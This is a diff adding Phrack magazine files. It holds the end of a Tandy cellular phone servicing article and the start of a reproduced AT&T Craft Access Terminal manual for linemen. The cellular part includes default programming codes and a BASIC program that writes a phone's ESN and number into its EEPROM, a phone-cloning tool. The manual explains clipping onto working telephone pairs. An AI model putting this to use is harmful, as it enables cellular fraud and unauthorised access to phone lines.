+of C908, adjust VR908 to provide a reading of 8 vdc (q 0.1 volt).
+
+2)   With the voltmeter attached to the positive terminal of
+C913, adjust VR918 for a reading of 8 vdc (q 0.1 volt).
+
+3)   Connect the voltmeter to test point TXV and enter diagnostic
+command 0, 1, SEL, 9, END.  Adjust C676 to achieve a reading of 5
+vdc control voltage (q 0.1 volt).
+
+4)   Check receiver control voltage with test point RXV.  Adjust
+C614 for a reading of 4 vdc (q 0.1 volt).
+
+5)   With  a power meter connected to the antenna connector of
+the transceiver through an attenuator, enter command SEL, 1, 2, SND,
+END to turn on the transmitter at high power.  VR814 should then
+be adjusted to show 3 watts (34.8 dBm) on the power meter.
+
+6)   Using the same power meter, enter command SEL, 1, 3, 7, END.
+
+Adjust VR846 for a low power maximum reading of 4 milliwatts (6
+dBm).
+
+7)   Using a frequency counter to measure the output of the
+antenna connector, adjust X600 for a reading of 836.4000 MHz (q 0.1 kHz).
+
+8)   Using a deviation meter, activate DTMF tones with command
+SEL, 2, 1, END, 1, 1, END and adjust VR259 for 8.4 kHz q 0.1 kHz DTMF
+deviation.
+
+9)   End DTMF signaling with command 1, 0, END.  Enable SAT
+transmission by entering SEL, 2, 8, SND, END and adjust VR261 for
+7.8 kHz deviation (q 0.1 kHz).
+
+10)  Enter SND, END to discontinue SAT signaling.
+
+
+                        ADDITIONAL ADJUSTMENT
+
+The level of audio fed to the earphone via the "ear" line (pin #7
+on the handset connector) can be adjusted via VR215.  1.2 Vrms is
+the factory specified level with the volume turned up to it's
+maximum setting.
+
+Received audio signals can be adjusted for minimal distortion by
+peaking L703.
+
+Frequency deviation of voice audio can be fine tuned with VR260. 
+Factory spec. is for 8 kHz deviation.
+
+
+     POWER LOSS
+
+If the transceiver refuses to even power up and begin self-diagnostics,
+check the traces on the underside of the board near the power connector.
+
+Most of these units 'protect' themselves against reverse polarity
+being present on the power cables with fusible traces.  If the
+phone is connected to a vehicle or battery power supply backwards,
+one of these very small circuit traces will vaporize, leaving the
+phone inoperative.
+
+While inconvenient for the customer and service technician alike,
+repairing the trace is an additional source of revenue for the
+shop that might not be generated had a standard replaceable fuse or
+rectifier been utilized in the design.
+
+
+                             APPENDIX III
+
+                         TECHNICAL RESOURCES
+
+
+
+     EEPROM PROGRAMMER
+
+In preparing this article and performing other research involving various
+types of firmware, we used the EPROM+ programming system from Andromeda
+Research.  This small, portable device is housed in a carrying case and
+requires no internal card to operate with your PC.  Once the software is
+installed on the computer, the EPROM+ programmer is simply plugged into an
+available parallel printer port.
+
+To program the PCD8572 series EEPROMs, a small adapter is required.
+
+You can construct this yourself from the included instructions,
+or purchase it already built for about $35 extra.
+
+The EPROM+ programming system is available for $289 from the
+manufacturer:
+
+     Andromeda Research
+     P.O. Box 222
+     Milford, Ohio 45150
+     (513) 831-9708 - voice
+     (513) 831-7562 - fax
+
+
+     SERVICE MANUALS
+
+Service manuals are available for most Radio Shack or Tandy products from
+Tandy National Parts.  Ordering these publications requires that you visit
+your local Radio Shack store.  Tell the clerk that you want him (or her)
+to call National Parts and order a service manual for catalog number....
+
+National Parts no longer accepts calls from consumers and will only
+ship to a recognized Radio Shack retail outlet.
+
+     NOKIA - MOBIRA
+
+Service handsets, manuals and other parts can be ordered from
+Nokia-Mobira in Largo, Florida.  Their toll-free technical
+assistance number is (800) 666-5553.
+
+     TANDY FAX-BACK SERVICE
+
+Tandy Support Services offers technical information via fax-back
+server.  There is no mention that the service is restricted to
+Radio Shack stores.  Although ANI can be hell, the toll-free number
+is (800) 323-6586 if you want to be faxed product info on assorted 'Shack
+products.  The server makes neat video game noises, and thanks you for
+using the service.
+
+For an index of the cellular specification sheets available via
+fax-back, request document #8882.
+
+Programming instructions are also available from this automated
+fax server:
+
+DOCUMENT #     PHONE MODEL
+
+9009           Current List [index] 
+8728           CT-105, 1050, 1055
+9004           CT-350
+9005           CT-302
+9006           CT-102, 103, 104, 1030, 1033
+9007           CT-300, 301
+9008           CT-100, 101, 200, 201
+9020           CT-351
+9665           BC901ST         [170-1015]
+9579           CP-1700         [170-1016]
+9577           CP-4600/5600    [170-1067 / 170-1056]
+14493          Ericsson AH-210 [170-1064]
+9581           EZ-400          [170-1057]
+9743           Motorola 12822  [170-1058]
+9583           Motorola DPC550 [170-1059]
+
+This information provided for reference purposes only.  Use of
+this fax-back service may be restricted to authorized personnel.  No
+one has ever faxed me to complain, however. 
+
+                       THE INTERFACE
+
+The uuencoded drawing which accompanies this article describes the
+interface required to use the programming software to rebuild the data
+stored within the serial EEPROM.  Because there are a number of variables
+that can affect the performance of this software and interface, prepare
+yourself for a bit of trial and error.  A standard programming device is
+recommended over the use of this software.  Since the original publication
+of this manual in hard-copy, we've heard reports that the software does not
+work well with the PCD8572, but does favor the PCD85C72 (CMOS version).
+
+The DB-25 connector is wired to an 8-pin DIP socket to accommodate the 8572
+integrated circuit.  A regulated, well-filtered source of 5 volts must be
+connected to pin #8 of the DIP socket, and Pin #4 must be tied to ground.
+If the PC used for programming and the power source to the IC socket share
+a common ground, you may be able to use pin #25 of the parallel port connector
+as shown in the diagram.
+ 
+Please be careful not to cause any shorts in this instance or you
+may damage your computer by sinking too much current through the
+parallel port.  If you are unsure of what you are doing, eliminate
+the connection between pin #4 of the IC socket and pin #25 of the
+DB-25 connector.  Instead, connect pin #4 directly to ground.
+
+The resistor shown in the circuit is used as an optional voltage
+divider.  Depending on the voltage provided by pin #2 of your
+parallel port, a resistor between 100 and 1k ohms may be required
+to drop it to a level within the nominal range required by the
+EEPROM. 
+
+                       TUNING THE RADIO
+
+The diagrams in the uuencoded .zip file will assist in identifying and
+locating the various adjustment points on the logic board and transceiver (RF)
+PC board.  Alignment should not be attempted by technicians unfamiliar with
+the principles involved, or in the absence of calibrated radio frequency
+measurement equipment.
+
+A diagnostic (service) handset may be required to access
+service-level commands within the transceiver.  If the phone does
+not respond properly to the commands documented herein, you'll
+need to obtain a service handset from Tandy National Parts.  This
+handset is actually a Nokia "programming handset" which can be
+obtained directly from the factory.
+
+                       PROGRAMMING TEMPLATE
+
+          For Tandy / Radio Shack Cellular Mobile Telephones
+                 Models CT-102, 302, 1030, 1033, etc.
+
+
+
+1)   Power up phone.  After the phone cycles through it's
+self-test mode and the display clears, enter the following keystrokes from
+the keypad:
+
+     *, 3, 0, 0, 1, #, X, X, X, X, X, SEL, 9, END
+
+The X, X, X, X, X represents the five-digit security code stored
+in EEPROM.  The factory default is 1, 2, 3, 4, 5.  This security
+code is required to access handset programming mode.
+
+2)   The display will now read:    IdEnt IF InFO Pri
+
+3)   Press END to program NAM 1.  Display will show first
+programming step.
+
+4)   To program NAM 2, press SND twice instead of END.  Display
+will cycle through:       OPt InFO diSAbLEd  then OPt InFO EnAbLEd
+     
+5)   Use the END key to step through each step.  The SND key
+toggles the state of single-digit options.  To enter new
+information, use END to step through the display until the old
+data is displayed.  Key in the new data and press END to increment to
+the next step.
+
+6)   When programming has been completed, press SEL, CLR to save
+changes.
+
+
+Step #    Desired Input  Display   Data Description
+
+01        5 digits       HO-Id     SIDH (Home System Identification)
+02        0 or 1         MIN Mark  MIN Mark (Toggle with SND)
+03        0 or 1         LOCL OPt  Local Use Mark (Toggle with SND)
+04        10 digits      Phon      MIN (Area Code + Mobile Number)
+05        08             St CLASS  SCM (Station Class Mark)
+06        333 or 334     PAging Ch IPCH (Initial Paging Channel)
+07        2 digits       O-LOAd CL Access Overload Class
+08        A or B         PrEF SyS  Preferred System (Toggle with SND)
+09        2 digits       grOUP Id  GIM Mark (Set to 10 in U.S.)
+10        5 digits       SECUrity  Security Code
+11        -------        1 dAtE    Firmware Date - not changeable
+12        mmddyy         2 dAtE    Installation Date
+
+Press SEL, CLR to save & exit.  Turn Power off and back on for
+model CT-302.
+
+
+[Begin Editorial]
+
+--------------------------------------------------------------------------
+HOW TO OBTAIN A HARD-COPY VERSION OF THIS FILE - WITH ALL PHOTOS:
+--------------------------------------------------------------------------
+
+"The Complete Guide to Tandy / Radio Shack Cellular Hardware" is available
+for $15 prepaid.  We keep $5 of the price to cover the cost of printing
+and the Priority mail postage.  The remaining $10 of the purchase price will
+be donated to Boston's The L0pht to help them cover the cost of upgrading
+their Internet connection for l0pht.com....
+
+The guys at the L0pht have always been cool with us, and maintain what
+amounts to one of the best cellular archives accessible on the 'net.  We
+want to do what we can to assist them in providing this public source of
+enlightenment.  Now you can help them, and get something for it in return.
+If nothing else, you can sit back and enjoy all my great close-up photos
+of the chips <g>!
+
+                                            -- Damien Thorn
+
+Here's the address:
+
+Phoenix Rising Communications
+3422 W. Hammer Lane, Suite C-110
+Stockton, California 95219
+
+[end editorial]
+
+-----------------------------------------------------------------------------
+You can reach me via e-mail at:  damien@prcomm.com
+-----------------------------------------------------------------------------
+
+
+
+1000 ' CELLULAR DATA REPAIR UTILITY
+1005 ' Form image and program PCD8572 IC via LPT port.
+1010 ' (c) 1993, 1994, 1995 WarpCoreBreachGroup - All rights reserved.
+1015 ' 
+1020 ' This program is not shareware/freeware.
+1025 '
+1030 DATA xx,xx,xx,xx,xx,xx,xx,xx ' Bytes 00-07
+1040 DATA xx,38,xx,xx,xx,xx,xx,xx ' Bytes 08-15
+1050 DATA 00,00,00,00,xx,xx,xx,xx ' Bytes 16-23
+1060 DATA xx,xx,xx,xx,xx,xx,xx,xx ' Bytes 24-31
+1070 DATA xx,xx,xx,D6,C5,5C,C6,00 ' Bytes 32-39
+1080 DATA 27,00,01,01,11,11,11,11 ' Bytes 40-47
+1090 DATA 11,08,4D,01,0F,01,0F,00 ' Bytes 48-55
+1100 DATA 04,00,00,00,FF          ' Bytes 56-60
+1105 UNIT1$="050490"
+1110 DIM BYTE$(60),BYTE(61)
+1120 FOR I=0 TO 60:READ BYTE$(I):NEXT
+1130 FILES "*.IMG"
+1140 LINE INPUT "Which file do you want to read? ";F$
+1150 OPEN "I",#1,F$+".IMG"
+1160 INPUT#1,ESNPREFIX
+1170 INPUT#1,ESN#
+1180 INPUT#1,HOMEID
+1190 INPUT#1,ACCESS
+1200 INPUT#1,LOCALOPT
+1210 INPUT#1,PHONE$
+1220 INPUT#1,STATCLASS
+1230 INPUT#1,PGCH
+1240 INPUT#1,OVERLDCL
+1250 INPUT#1,PREFSYS
+1260 INPUT#1,GROUPID
+1270 INPUT#1,SEC$
+1280 ' Building binary image
+1290 UNIT2$=MID$(UNIT$,1,2)+MID$(UNIT$,4,2)+MID$(UNIT$,9,2)
+1300 CLOSE #1
+1310 FOR I=1 TO 5:BYTE$(I-1)="3"+MID$(SEC$,I,1):NEXT
+1320 FOR I=0 TO 2:BYTE$(10+I)=RIGHT$("0"+HEX$(VAL(MID$(UNIT1$,I*2+1,2))),2)
+1325 NEXT
+1330 FOR I=0 TO 2:BYTE$(13+I)=RIGHT$("0"+HEX$(VAL(MID$(UNIT2$,I*2+1,2))),2)
+1335 NEXT
+1340 FOR I=0 TO 4:BYTE$(24+I)=MID$(PHONE$,2*I+1,2):NEXT
+1350 FOR I=5 TO 0 STEP -1
+1360 Q=INT(ESN#/(16^I))
+1370 ESN#=ESN#-Q*(16^I)
+1380 IF Q>9 THEN Q=Q+7
+1390 ESN$=ESN$+CHR$(48+Q)
+1400 NEXT
+1410 BYTE$(8)=RIGHT$("0"+HEX$(ESNPREFIX),2)
+1420 BYTE$(5)=MID$(ESN$,5,2)
+1430 BYTE$(6)=MID$(ESN$,3,2)
+1440 BYTE$(7)=MID$(ESN$,1,2)
+1450 FOR I=0 TO 60:Q$=BYTE$(I)
+1460 QH=ASC(LEFT$(Q$,1))-48:IF QH>9 THEN QH=QH-7:IF QH>15 THEN QH=QH-32
+1470 QL=ASC(RIGHT$(Q$,1))-48:IF QL>9 THEN QL=QL-7:IF QL>15 THEN QL=QL-32
+1480 Q=QH*16+QL
+1490 BYTE(I)=Q:CHECK=CHECK+Q
+1500 NEXT
+1510 BYTE(20)=HOMEID AND 255:BYTE(21)=INT(HOMEID/256)
+1520 BYTE(22)=ACCESS
+1530 BYTE(23)=LOCALOPT
+1540 BYTE(29)=STATCLASS
+1550 BYTE(30)=PGCH AND 255:BYTE(31)=INT(PGCH/256)
+1560 BYTE(32)=OVERLDCL
+1570 BYTE(33)=PREFSYS
+1580 BYTE(34)=GROUPID
+1590 AC$=MID$(PHONE$,1,3)
+1600 PRE$=MID$(PHONE$,4,3)
+1610 PH$=MID$(PHONE$,7,4)
+1620 AC=VAL(AC$)
+1630 IF MID$(AC$,2,2)="00" THEN AC2=AC-1:GOTO 1670
+1640 IF MID$(AC$,3,1)="0" THEN AC2=AC-101:GOTO 1670
+1650 IF MID$(AC$,2,1)="0" THEN AC2=AC-11:GOTO 1670
+1660 AC2=AC-111
+1670 PRE=VAL(PRE$)
+1680 IF MID$(PRE$,2,2)="00" THEN PRE2=PRE-1:GOTO 1720
+1690 IF MID$(PRE$,2,1)="0" THEN PRE2=PRE-11:GOTO 1720
+1700 IF MID$(PRE$,3,1)="0" THEN PRE2=PRE-101:GOTO 1720
+1710 PRE2=PRE-111
+1720 IF PRE2<0 THEN PRE2=1000+PRE2
+1730 IF LEFT$(PH$,1)="0" THEN D=-24:GOTO 1750
+1740 D=87-24*(ASC(PH$)-49)
+1750 IF MID$(PH$,4,1)="0" THEN D=D-10
+1760 IF MID$(PH$,3,1)="0" THEN D=D-100
+1770 IF MID$(PH$,2,1)="0" THEN D=D-1000
+1780 IF MID$(PH$,1,1)="0" THEN D=D-10105
+1790 PH2=VAL(PH$)-D
+1800 C=INT(PRE2/4)
+1810 B=64*(PRE2 AND 3)
+1820 A=PH2 AND 255
+1830 B=B OR INT(PH2/256)
+1840 BYTE(35)=A
+1850 BYTE(36)=B
+1860 BYTE(37)=C
+1870 BYTE(38)=AC2 AND 255
+1880 BYTE(39)=INT(AC2/256)
+1890 CHECK=0
+1900 FOR I=0 TO 60
+1910 CHECK=CHECK+BYTE(I)
+1920 NEXT
+1930 BYTE(61)=CHECK AND 255
+1940 DEV$="1010":ADDR$="000"
+1945 ' Select the base address for your printer port with the next line.
+1950 BASE=&H378 ' Which is LPT2. &h378 is LPT1 and &h3bc is LPT3.
+1960 GOTO 2120
+1970 OUT BASE,(DOUT AND 1) OR 2*(CLK AND 1) OR 4*(RELAY)
+1980 FOR DELAY=0 TO 9:NEXT
+1990 DIN=INP(BASE) AND 1
+2000 RETURN
+2010 FOR I=1 TO LEN(B$)
+2020 B=ASC(MID$(B$,I,1))-48
+2030 DOUT=B:CLK=0:GOSUB 1970
+2040 DOUT=B:CLK=1:GOSUB 1970
+2050 DOUT=B:CLK=0:GOSUB 1970
+2060 NEXT
+2070 T=0
+2080 DOUT=1:CLK=1:GOSUB 1970
+2090 IF DIN=0 THEN RETURN
+2100 IF T=200 THEN BEEP:PRINT "Nack timeout error":STOP
+2105 ' Is voltage applied to the chip?
+2110 T=T+1:GOTO 2080
+2120 MAX=61:RELAY=1:DOUT=1:CLK=1:GOSUB 1970
+2130 T$=TIME$
+2140 IF T$=TIME$ GOTO 2140
+2150 FOR J=0 TO MAX
+2160 DOUT=1:CLK=1:GOSUB 1970 ' Start bit
+2170 IF DIN=0 THEN BEEP:PRINT "Bus not free error":STOP ' Bad!
+2180 DOUT=0:CLK=1:GOSUB 1970
+2190 DOUT=0:CLK=0:GOSUB 1970
+2200 B$=DEV$+ADDR$+"0"
+2210 GOSUB 2010
+2220 B$=""
+2230 FOR I=7 TO 0 STEP -1
+2240 IF (J AND (2^I)) THEN B$=B$+"1" ELSE B$=B$+"0"
+2250 NEXT
+2260 GOSUB 2010
+2270 Z=BYTE(J)
+2280 B$="":FOR I=7 TO 0 STEP -1
+2290 IF (Z AND (2^I)) THEN B$=B$+"1" ELSE B$=B$+"0"
+2300 NEXT
+2310 GOSUB 2010
+2320 DOUT=0:CLK=0:GOSUB 1970
+2330 DOUT=0:CLK=1:GOSUB 1970 ' Stop bit
+2340 DOUT=1:CLK=1:GOSUB 1970
+2350 PRINT USING "###% programmed";100*J/MAX
+2360 PRINT STRING$(80*J/MAX,46)
+2370 LOCATE CSRLIN-2,POS(0)
+2380 GOSUB 1970
+2390 IF DIN=0 GOTO 2380
+2400 NEXT
+2410 RELAY=0:DOUT=1:CLK=1:GOSUB 1970
+2420 PRINT:PRINT
+2430 'This is the end in case you though the code was truncated somehow...
+
+
diff --git a/phrack48/8.txt b/phrack48/8.txt
new file mode 100644
index 0000000..50aa915
--- /dev/null
+++ b/phrack48/8.txt
@@ -0,0 +1,1046 @@
+                              ==Phrack Magazine==
+
+                 Volume Seven, Issue Forty-Eight, File 8 of 18
+
+
+    .:::::  :::::.  .::::.  .::::: ::::::
+    ::      ::  ::  ::  ::  ::       ::                          
+    ::      ::  ::  ::  ::  ::       ::                          
+    ::      :::::'  ::::::  :::::    ::                          
+    ::      :::::.  ::  ::  ::       ::
+    `:::::  ::  ::  ::  ::  ::       ::
+
+    .::::.  .:::::  .:::::  .:::::  .:::::  .:::::
+    ::  ::  ::      ::      ::      ::      ::
+    ::  ::  ::      ::      ::::    `::::.  `::::.
+    ::::::  ::      ::      ::          ::      ::
+    ::  ::  ::      ::      ::          ::      ::
+    ::  ::  `:::::  `:::::  `:::::  :::::'  :::::'
+
+    ::::::  .:::::  .::::.  .::::::.  ::  .:::: ::  .::::.  ::
+      ::    ::      ::  ::  :: :: ::  ::  :: :: ::  ::  ::  ::
+      ::    ::::    ::  ::  ::    ::  ::  :: :: ::  ::  ::  ::
+      ::    ::      :::::'  ::    ::  ::  :: :: ::  ::::::  ::
+      ::    ::      ::::.   ::    ::  ::  :: :: ::  ::  ::  ::
+      ::    `:::::  ::  ::  ::    ::  ::  :: `::::  ::  ::  `::::
+
+------------------------------------------------------------------------------
+
+                     Written by Boss Hogg
+
+Greets: Voyager/Splatter/Mr.Hyde/Misfit/Darkseed/][avok/Paradyne
+        Ethereal Gloom/Surgat/GOL/Carnage/Kamakize/Seeker/Stravis
+        + all others with weird thoughts and ideas.
+
+
+        The craft.
+
+        Although its called a Craft Access Terminal, the craft hardly
+represents a standard computer terminal. It is in actually a lineman's
+handset with a built in terminal and 1200 baud modem. The unit looks
+like a handset on steroids measuring 12.5" in length. The ones in our
+particular area were bright yellow and looks like a rejected Sesame
+Street prop. We have reports that they also made them in a blue color as
+well though we have yet to see one in use in our area.
+
+        The unit features a 4 line x 16 character LCD display, and a
+joystick with a plunger on the top. You will find a diagram of the unit
+with descriptions in brackets.
+
+        These units are possibly being phased out in a few areas and
+have been found at telco auctions as well as from surplus stores. They
+could be replacing these yellow units with the blue units (Which have
+the same basic descriptions yet are newer. The crafts we have found were
+severely worn). We have also heard they were being replaced with a
+Access-2 terminal (rumored to represent a HP-95lx palmtop; Fold open,
+larger LCD screen).
+
+        This is essentially the entire uncopywritten manual to the
+terminal. The unit can be somewhat confusing at first due to a somewhat
+weird menu layout.
+
+
+Also, to avoid confusion:
+
+ - The page numbers are located at the bottom of the pages. You may wish
+to add pagefeeds and space out the page numbers to the bottom of the
+page if you want to print it out and stick it in your phreakers binder
+or whatever.... The line is meant for the top of each page... As there
+is a line at the top in the real manual.
+
+
+----Here begins the Craft Access Terminal Instruction Manual----
+
+
+
+
+
+
+                              AT&T
+
+                       Craft Access Terminal
+
+
+
+                        Instruction Manual
+
+
+
+
+
+
+                             -cover-
+
+
+        -----------------------------------------------------------
+
+
+        Table of Contents
+       
+                                       Page
+    
+          Features                     : 2
+          Using the pointer            : 4
+          Battery Pack                 : 6
+          Connecting to a working pair : 8
+          Making a telephone call      : 9
+          Calling a computer           : 12
+          Working with a computer      : 15
+          Getting help                 : 15
+          Making or canceling a
+           selection on a screen       : 17
+          Reading stored information   : 19
+          Filling in information       : 20
+          Taking care of your terminal : 25
+
+
+
+
+        -----------------------------------------------------------
+
+
+        Getting Started
+
+        Two battery packs, a charger and a short charger adaptor cord
+        should be in the box with the Craft Access Terminal. Before
+        using the Craft Access Terminal, insert a battery pack. The
+        battery pack must be charged before use. For directions on how
+        to charge and insert the battery pack, look at the section of
+        the instructions called "The Craft Access Terminal's Battery
+        Pack." This section begins on page 6.
+
+
+
+
+                                      -1-
+
+
+
+
+        -----------------------------------------------------------
+
+
+        Craft Access Terminal Features
+
+
+ 
+         Receiver - Works like any ordinary telephone receiver.
+          [points to ear-piece]
+
+         Transmitter - Works like an ordinary telephone transmitter.
+          [points to mouthpiece]
+
+         Craft Access Terminal - Identification Number
+          [points to sticker underneath the TRANSMITTER]
+
+         Phone Jack - A modular telephone cord can be plugged in here.
+          [located on bottom of the handset]
+
+         Recharger Jack - The plug on the recharger cord is inserted into
+                          the jack.
+          [located on bottom of the handset]
+
+         Connecting Cord - Connects to a working pair to get dial tone for
+                           making a call to either a telephone or a computer.
+          [extends from bottom of handset]
+
+
+                                      -2-
+
+
+
+
+        -----------------------------------------------------------
+
+
+
+          Screen - A liquid crystal display shows information
+                   or instructions.
+           [on top-front of handset. c'mon- you cant miss it!]
+
+          Mode Switch
+            Three positions:
+                  Talk      -make a phone call
+                  Monitor   -listen for conversation
+                  Data      -make a computer call
+          Moving the switch to monitor will disconnect a call.
+           [This switch is located on the right-top side, when the ]
+           [LCD screen is facing you                               ]
+
+          Pointer - Used to mark and select actions on the screen and to
+                    indicate where you want to enter information.
+           [Joystick located under Screen]
+
+          Rechargeable Battery Pack - Provides power for the terminal. The
+                                      pack must be recharged every day.
+
+        [This is accessed by removing a cover held in place by a normal ]
+        [phillips screw. The compartment is located under the pointer.  ]
+        [NOTE: Although there is a 9-volt battery snap, the thing only  ]
+        [uses 4 1.2volt nicads... 4 AA batteries work fine... For those ]
+        [whose sets didn't come with battery packs                      ]
+
+          Alpha Numeric Keypad - Used to enter letters and numbers on the
+                                screen.
+            [Uhh- A normal Touch Tone pad... Cant miss it ]
+
+                                    
+             
+                                      -3-
+
+
+
+
+        -----------------------------------------------------------
+
+
+        Using the pointer
+
+
+
+                           The pointer allows you to make choices from a
+                           screen, show where you want to fill in information,
+    B     BACK             read information that is temporarily stored for you
+    A                      in the Craft Access Terminal, and get an
+ H  C  <   ^   >  N  S     explanation about a screen.
+ E  K  <  .-.  >  E  E
+ L  S  <  `-'  >  X  N     Remember that you must push the pointer to 
+ P  P  <   V   >  T  D     make a choice.
+    C
+    E    REVIEW            The pointer can be moved along the right side,
+                           along the left side, to the top center and bottom
+                           center position.
+<,>,^,V
+    = joystick direction
+
+.-. =  Joystick
+`-'    
+
+                1. If you want to select from two or more choices on the
+                   screen, move the Pointer along the right side until
+                   the arrow (>) appears next to the line you want to
+                   select and then press the Pointer.
+
+
+
+
+                                      -4-
+
+
+
+
+        -----------------------------------------------------------
+
+
+
+
+                2. If you want additional information about one of the
+                   choices on the screen, move the Pointer along the
+                   left side until the question mark (?) appears next to
+                   the line where you need HELP and then press the
+                   Pointer.
+
+
+                3. If you want to go BACK one screen, move the Pointer
+                   to the top center position and then press the
+                   Pointer.
+
+                4. If you want to REVIEW information stored in your
+                   Craft Access Terminal, move the Pointer to the bottom
+                   center position and then press the Pointer.
+
+                                      -5-
+
+
+
+
+        -----------------------------------------------------------
+
+
+        The Craft Access Terminal's Battery Pack
+
+         You must charge the terminals battery pack at least once every
+          day. It may take up to twelve hours for a full charge if the
+          battery pack has run down completely. Also, before the first
+          use, each battery pack should be charged for 24 hours.
+
+         To do this, insert the plug at the other end of the cord
+          attached to the charger into the socket at the transmitter end
+          of the Craft Access Terminal. Plug the charger at the end of
+          the cord into an electrical outlet. The red light on the
+          charger should be lit if it is charging properly. However, the
+          light will not go out if the battery is fully charged. It is
+          advisable to keep the extra battery pack charged so you can
+          use it if the battery pack in the terminal you're using runs
+          down. To charge the spare battery pack, plug the charger
+          adapter cord, (the short cord included with the charger) into
+          the pack. Plug the other end of the adapter cord into the
+          charger, and plug the charger into an electrical outlet.
+
+         CAUTION
+
+          The charger should only be used indoors and only for charging
+          Craft Access Terminal.
+
+         In the battery pack runs out of power while you are using the
+          terminal, the pack can be removed and the charged pack can be
+          inserted. To do this, follow these steps:
+
+         1. Open the Battery Pack Compartment
+                Loosen the screw to open the battery cover. Do not hold
+                down battery compartment cover while loosening the
+                screw.
+
+         2. Remove the Battery Pack
+                Lift out battery pack. Unsnap the battery pack from the
+                connector.
+
+                                      -6-
+
+
+
+
+        -----------------------------------------------------------
+
+
+
+
+         3. Insert the Battery Pack
+                Snap the charged battery pack into the connector. 
+		Slide the battery pack into the Craft Access Terminal.
+                Close the battery cover. Don't forget to tighten
+                the screw.
+
+         How Long Will the Craft Access Terminal Stay Charged?
+
+           At normal temperatures, the Craft Access Terminal will
+           operate for approximately 12 hours after being charged.
+
+         The Craft Access Terminal can be used in warm or cold
+          temperatures. You should keep in mind however, that the
+          battery pack will be drained faster in cold weather. At -20
+          degrees Fahrenheit, it may last only 8-10 hours.
+
+         The battery pack in the Craft Access Terminal should no be
+          charged at temperatures less than 40 degrees Fahrenheit.
+
+         Battery Pack Life
+
+          The battery pack can be charged many times, providing a
+          working life of about 5 years. The four digit number stamped
+          on the end of the battery is its date of manufacture.
+
+
+                                      -7-
+
+
+
+
+        -----------------------------------------------------------
+
+
+        Connecting to a Working Pair
+
+
+         Monitor the Line
+          Before connecting to a pair, set the switch at the Monitor
+          (center) position.
+
+         Connect Cord and Clips
+          Attach cord clips to tip and ring. If you hear a conversation,
+          select another pair. You should hear dial tone when connected
+          to an available working pair.
+
+       * Connect at a standard terminal point whenever possible to avoid
+          puncturing the insulation; holes made in insulation by clips
+          can lead to later corrosion problems
+
+         Alternately, dial tone can also be obtained by inserting a
+          modular cord as shown on page 2. Do not insert line cord to
+          modular jack and connect to tip and ring at the same time. It
+          will not work.
+
+         Move back to monitor to increase or decrease volume. To
+          increase the volume, move the Pointer along the right side
+          until the arrow (>) in next to "increase volume" and then
+          press the Pointer.
+
+         To decrease the volume, point to the third line, and press.
+
+         If you want to use the terminal to listen for noise on the
+          line, point to the second line and press. This puts the
+          terminal in the "quiet" mode so that very low levels of noise
+          can be detected.
+
+         Notice that the top line on this screen can't be selected. To
+          indicate this, the first space on the line contains a bar.
+          (I).
+
+         You can now make an ordinary telephone call be moving the
+          switch to Talk (see Making a Telephone Call) or call a
+          computer by moving the switch to Data (see Calling a
+          Computer).
+
+
+                                      -8-
+
+
+
+
+        -----------------------------------------------------------
+
+
+        Making a Telephone Call
+
+
+         Move the switch from Monitor to Talk Position
+
+
+         Monitor the line to be sure it isn't in use. If no one is
+          talking on the line, move the switch from Monitor to Talk.
+
+         Telephone Number Entry and Correction
+
+         If the line is good, you will hear a dial tone. You can enter
+          the number you want to call through the keypad. If a number is
+          already filled in, you can call that number, or, if you want
+          to call a different number, erase the number that is on the
+          screen by pressing * on the Touch-tone pad, and enter another
+          number.
+
+        * If the (*) is entered as the first character, it will not
+          erase unless another (*) us entered.
+
+         The small flashing bar is called the cursor. The cursor will
+          appear where a number must be entered.
+
+         As each digit to the telephone number is filled in, it will
+          appear where the cursor was, and the cursor will move one
+          space to the right. Enter a pound (#) between digits to
+          indicate a 2-second pause in dialing where required (to wait
+          for a second dial tone behind a PBX number, for example). For
+          a longer pause, press pound (#) several times.
+
+
+
+
+
+                                      -9-
+
+
+
+
+        -----------------------------------------------------------
+
+
+
+
+         When the correct phone number is shown, move the Pointer to the
+          right side (anywhere along the right side will do) and press.
+          If you need to rotary dial, select the last line with the
+          Pointer before you press. The Craft Access Terminal will dial
+          the number. You can re-dial by moving the Pointer to the right
+          side and pressing again.
+
+         The Craft Access Terminal will save the telephone number and it
+          will appear the next time the switch is moved to the Talk
+          position.
+
+         You can listen as the Craft Access Terminal dials the number.
+          If you hear a busy signal after dialing is completed, or if no
+          one answers the call, disconnect by moving the switch to the
+          Monitor position.
+
+         Call in Progress and Volume Control
+
+         When dialing is completed, this screen appears. Use the
+          Pointer the increase or decrease the volume of the receiver,
+          or to mute the trans mitter to listen only.
+
+         The volume level is indicated by the number of filled spaces on
+          the increase volume line. One filled space for minimum volume,
+          four for maximum.
+
+
+                                      -10-
+
+
+
+
+        -----------------------------------------------------------
+
+
+        Disconnecting
+
+         Moving the switch to the Monitor position will end the phone
+          call, and this screen will appear.
+
+         Be sure to move the switch to the Monitor position after
+          disconnecting. This will conserve battery power as the
+          terminal drains the least amount of power in the monitor mode.
+
+         If you are accidentally disconnected, move the switch to the
+          Monitor position and start again.
+
+
+
+
+                                      -11-
+
+
+
+
+        -----------------------------------------------------------
+
+
+        Calling the Craft Access System Computer
+
+
+
+         Move the Switch from Monitor to Data Position.
+
+          Monitor the line to be sure it isn't in use. If no one is
+           talking on the line, move the switch from Monitor to Data.
+
+         Telephone Number Entry and Correction
+
+          You can enter the number you want to call through the keypad.
+           If a number is already filled in, you can call that number,
+           or, if you want to call a different number, erase the number
+           on screen by pressing the asterisk (*) on the Touch-tone pad,
+           and fill in another number.
+
+          The cursor will appear where a number must be entered.
+
+
+          Fill in the computer's telephone number if it isn't already
+           shown. Put a pound (#) between digits to indicate a 2-second
+           pause in dialing where required (to wait for a second dial
+           tone behind a PBX number, for example). For a longer pause,
+           press pound (#) several times.
+
+
+
+                                      -12-
+
+
+
+
+        -----------------------------------------------------------
+
+
+
+
+          When the correct phone number is shown, move the Pointer to
+           the right side (anywhere along the right side will do)and
+           press. The Craft Access Terminal will dial the number. You
+           can re-dial by moving the Pointer to the right side and
+           pressing again.
+
+
+
+         Indications that the Call is Successful
+
+          If the call to the Craft Access System computer is successful,
+           you will hear a tone on the line. When the Craft Access
+           Terminal detects that tone, the tone will stop and a screen
+           like this will appear.
+
+          In some cases the call may not be successful. If you retry a
+           few times and still have difficulty, try connecting your cord
+           to another working pair.
+
+
+         Password Entry
+
+          Before you send or receive any computer information, you may
+           need to fill in a numeric password to identify yourself and a
+           number to identify your terminal. Your password can be used
+           only with your Craft Access Terminal. Fill in your password
